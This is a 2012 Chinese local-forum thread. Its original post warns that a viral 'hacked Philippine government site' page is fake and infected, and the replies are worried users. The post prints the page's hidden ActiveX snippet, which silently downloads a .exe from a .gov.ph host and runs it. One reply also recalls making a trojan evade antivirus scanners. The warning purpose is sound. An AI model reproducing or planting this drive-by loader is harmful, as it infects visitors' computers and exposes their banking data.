陆良论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

查看: 7379|回复: 17

所谓的菲律宾官网被黑,你们都被骗了,中马了

[复制链接]
发表于 2012-5-6 22:51:59 | 显示全部楼层 |阅读模式
       这几天QQ上到处都在传菲律宾官网被黑,还在奏国歌,看着貌似很解气的样子。我特地从网上找了篇文章来给大家看看。大家如果跟着围观了,那么恭喜你,说不定你电脑已经中马!!神马网银啊等着黑客洗劫吧

疑点1.

      www.pei.net.ph一个国家的官方网站,是不可能用这种二级域名的。笔者进行了GOOGLE搜索和百度搜索,发现没有任何搜索引擎以前的收录记录,试想一个国家的网站,访问量应该很大,而且从这个网站运作,应该就被搜索引擎收录过,笔者发现了上次快照更新时间已经是昨天了。那么,一个国家的机要网站,在发现自己被黑后一天都没人处理,难道他们国家没有技术人员了吗



疑点2.
           笔者通过查询了源代码和主机地址,发现网站http://lamitan.gov.ph/服务器放置地在美国。??
然后该网站还被挂了马。试想自己黑了给那么多华人看,攻击的人需要挂马害自己人吗,显示这个事情有猫腻。我们查看了源文件,发现了这样一段代码:

<BODY><OBJECT ID="*ActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="*ActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>



疑点3.

      我们下载了这个135pk.exe文件  上传到了查毒网,全部显示为病毒。而且如果是菲律宾官方挂的,也不用自动隐藏下载打开吧,文件有350KB 也不像是什么插件之类的。攻击的网站也不是菲律宾政府官网,而真正的官网应该是:www..gov.ph

然后我们在网上查到了.ph的菲律宾域名80元即可注册购买,因此。该事件在没有得到论证以前请没有经验的用户不要去打开。被钓鱼就麻烦了。



以上三个疑点说明  有人故意做了假网站,跟随菲律宾能源网站被黑一事在自己谋利。谋什么利呢,我们进群发现群管理不断发内容招人。招学员之类的。这个.....不用继续往下说了吧

发表于 2012-5-7 00:11:48 | 显示全部楼层
卧槽     真的?   是不是意味着我得重新安装系统了
发表于 2012-5-7 02:59:22 | 显示全部楼层
    www .pei .net .ph  在这个玉米下某发现你转贴说的代码。 。
lamitan. gov .ph/  这个玉米 下的代码貌似也是正常的。
发表于 2012-5-7 08:49:12 | 显示全部楼层
我也点击了
发表于 2012-5-7 09:50:40 | 显示全部楼层
哎,是那个孙子在群里发的,我操他妈,我今早看完以后还转帐了
发表于 2012-5-7 09:51:59 | 显示全部楼层
但是我用金山杀了一遍没查出什么异样啊
发表于 2012-5-7 13:39:08 | 显示全部楼层
我就看不惯这些,所以没点
 楼主| 发表于 2012-5-7 20:53:35 | 显示全部楼层
花语家纺 发表于 2012-5-7 09:51
但是我用金山杀了一遍没查出什么异样啊

木马之所以是木马,就是一般的杀毒软件也奈何不了他
发表于 2012-5-7 21:36:00 | 显示全部楼层
禽兽,还分析起代码来了,说不定你早被黑了
发表于 2012-5-8 08:53:49 | 显示全部楼层
秦兽 发表于 2012-5-7 20:53
木马之所以是木马,就是一般的杀毒软件也奈何不了他

嘿嘿,也了解了点,记得早前玩的灰鸽子一样,跟个朋友一天坐在一台电脑面前,装四五个杀毒软件,就为了做免杀,但那个时候的杀毒软件很没现在的功能强大了,有时候一晚上可以种上好些呢
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|Archiver|陆良网 ( 豫ICP备08002571号 )

法律顾问

GMT+8, 2024-11-6 07:09 , Processed in 0.052141 second(s), 22 queries , Gzip On.

中国 © 陆良网 2008-2023|关于陆论

运营机构:陆论工作室|站务QQ:450043295

Powered by Discuz!|滇网安备53032203502002号

快速回复 返回顶部 返回列表